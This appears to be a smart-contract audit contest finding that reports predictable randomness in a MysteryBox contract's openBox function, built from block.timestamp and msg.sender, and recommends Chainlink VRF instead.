[H-1] Insecure Random Number Generator
Description
The openBox function in the MysteryBox contract generates randomness using block properties such as block.timestamp and msg.sender combined with the keccak256 hashing function:
This approach to random number generation is insecure because it can be manipulated by miners or malicious actors. Miners have the ability to influence block attributes like block.timestamp, and by controlling the msg.sender, an attacker can potentially predict or influence the outcome of the random number generation. This predictability undermines the fairness and integrity of the reward distribution mechanism.
Impact
An insecure random number generator can lead to predictable or manipulable outcomes when users open mystery boxes. Malicious actors could exploit this vulnerability to consistently obtain high-value rewards or manipulate the reward distribution in their favor. This not only diminishes the trustworthiness of the contract but also deters genuine users from participating, fearing unfairness or exploitation. In severe cases, it could lead to financial losses for the contract if attackers drain high-value rewards, ultimately compromising the contract’s sustainability and reputation.
Tools Used
• Manual Review: Analyzing the smart contract code to identify vulnerabilities in the random number generation method.
Recommendations
Replace the existing random number generation method with Chainlink’s Verifiable Random Function (VRF), which provides secure and tamper-proof randomness.
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.